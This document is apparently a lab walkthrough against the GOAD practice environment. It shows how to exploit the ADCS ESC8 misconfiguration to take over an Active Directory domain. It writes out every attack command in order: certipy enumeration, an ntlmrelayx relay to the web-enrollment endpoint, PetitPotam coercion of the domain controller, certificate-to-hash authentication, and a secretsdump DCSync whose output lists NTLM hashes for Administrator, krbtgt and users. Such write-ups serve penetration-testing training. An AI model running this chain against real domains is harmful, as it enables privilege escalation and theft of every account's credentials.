Description
Active Directory Certificate Services (ADCS) is Microsoft’s Public Key Infrastructure (PKI). It runs as a Windows Server role (a “Certification Authority”, or CA) and its job is to issue digital certificates the digital ID cards of the network. We will look on how to exploit misconfiguration in ADCS to escalate privileges on domain networks.
Steps to exploit
- First enumerate the vulnerable ADCS
command
┌──(certipy_venv)─(n16hth4wk㉿n16hth4wk-sec)-[~/Documents/GOAD/certipy_venv/bin]
└─$ python certipy find -u jon.snow -p iknownothing -dc-ip 192.168.56.11 -stdout
We can see vulnerability ESC8 and we can see the web enrolment is enabled over http.
- Next we fire up relay listener ⚠️ make sure to use python venv to avoid errors
command
┌──(n16hth4wk㉿n16hth4wk-sec)-[~/Documents/GOAD]
└─$ ~/.local/bin/ntlmrelayx.py -t http://192.168.56.10/certsrv/certfnsh.asp --adcs --template "DomainControllerAuthentication" -smb2support
- Now we need to COerce the DC to authenticate to attacker
command
python PetitPotam.py -d north.sevenkingdoms.local/ -u 'jon.snow' -p 'iknownothing' $AttackerIP(192.168.56.1) $target(192.168.56.11)
- check our listener
We got success hit, we own a DC certificate.
- Now what it next is to convert this cert into kerberos ticket
TGTfor the DC’s machine account `
command
┌──(certipy_venv)─(n16hth4wk㉿n16hth4wk-sec)-[~/Documents/GOAD/certipy_venv/bin]
└─$ python certipy auth -pfx ../../WINTERFELL.pfx -dc-ip 192.168.56.11
We got the DC machine account nt hash. Now the juicy part getting domain admin.
- Doing DCSYNC with the nt hash that was gotten.
┌──(n16hth4wk㉿n16hth4wk-sec)-[~/Documents/GOAD]
└─$ secretsdump.py -hashes :76117ec144a9083557f93d3d81896c7d 'north.sevenkingdoms. local/winterfell$@192.168.56.11'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f1c487c83f8fe1a98410dd22645557fc:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d:::
brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
[SNIP]